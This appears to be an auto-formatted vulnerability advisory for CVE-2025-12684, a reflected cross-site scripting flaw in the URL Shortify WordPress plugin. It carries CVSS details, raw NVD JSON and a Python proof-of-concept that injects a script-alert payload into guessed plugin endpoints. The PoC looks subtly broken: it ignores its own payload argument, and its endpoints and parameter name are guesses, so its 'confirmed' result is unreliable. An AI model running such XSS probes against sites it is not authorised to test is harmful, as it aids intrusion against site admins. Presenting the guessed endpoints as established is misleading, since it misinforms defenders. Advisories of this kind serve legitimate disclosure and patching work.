Security Vulnerability Report
中文
CVE-2025-12684 CVSS 7.1 HIGH

CVE-2025-12684

Published: 2025-12-15 06:15:43
Last Modified: 2026-04-15 00:35:42

Description

The URL Shortify WordPress plugin before 1.11.3 does not sanitize and escape a parameter before outputting it back in the page, leading to a reflected cross site scripting, which could be used against high-privilege users such as admins.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

URL Shortify WordPress插件 < 1.11.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-12684 PoC - Reflected XSS in URL Shortify WordPress Plugin # Target: WordPress site with URL Shortify plugin < 1.11.3 def test_reflected_xss(target_url, payload): """ Test for reflected XSS vulnerability in URL Shortify plugin Args: target_url: Base URL of the WordPress site payload: XSS payload to test Returns: bool: True if vulnerability is confirmed """ # Common vulnerable endpoints in URL Shortify endpoints = [ '/wp-admin/admin-ajax.php', '/?rest_route=/url-shortify/v1/track', '/wp-content/plugins/url-shortify/' ] # Basic XSS payload test_payload = '<script>alert("XSS")</script>' # Test each endpoint for endpoint in endpoints: try: # Construct URL with payload in parameter test_url = f"{target_url}{endpoint}?url={test_payload}" response = requests.get(test_url, timeout=10) # Check if payload is reflected without encoding if test_payload in response.text: print(f"[+] Potential XSS found at: {test_url}") return True except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") return False # Example usage if __name__ == "__main__": target = "https://example-wordpress-site.com" result = test_reflected_xss(target, '<script>alert("XSS")</script>') print(f"Vulnerability confirmed: {result}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12684", "sourceIdentifier": "[email protected]", "published": "2025-12-15T06:15:42.530", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The URL Shortify WordPress plugin before 1.11.3 does not sanitize and escape a parameter before outputting it back in the page, leading to a reflected cross site scripting, which could be used against high-privilege users such as admins."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "references": [{"url": "https://wpscan.com/vulnerability/8f1e04c6-8781-4366-99d9-9a59102957cf/", "source": "[email protected]"}]}}